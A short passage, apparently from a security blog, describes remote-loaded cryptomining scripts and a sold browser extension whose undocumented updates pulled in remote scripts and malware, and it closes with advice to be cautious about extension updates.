The mining code doesn't need to be included in the webpage. You just call it from a remote site.
Another attack vector that gained some interest last week was the subversion of established browser extensions.
The writer/owner of a browser extension downloaded by 2M+ users sold the rights to an unknown party who made 'updates' to the code without documenting those changes. When some folks decided to look at the code changes (on GitHub) they found that what appeared to be innocuous additions of open source analytics code was in fact calling remote scripts and had links to other extensions that had been bought and replaced with malware.
Updates to the extension had also been downloaded automatically so it is probable that some users were running the suspect code without knowing it.
The moral of the story is be careful with what extensions you download, do not allow auto updates and don't update manually until you've checked that it's still clean.
|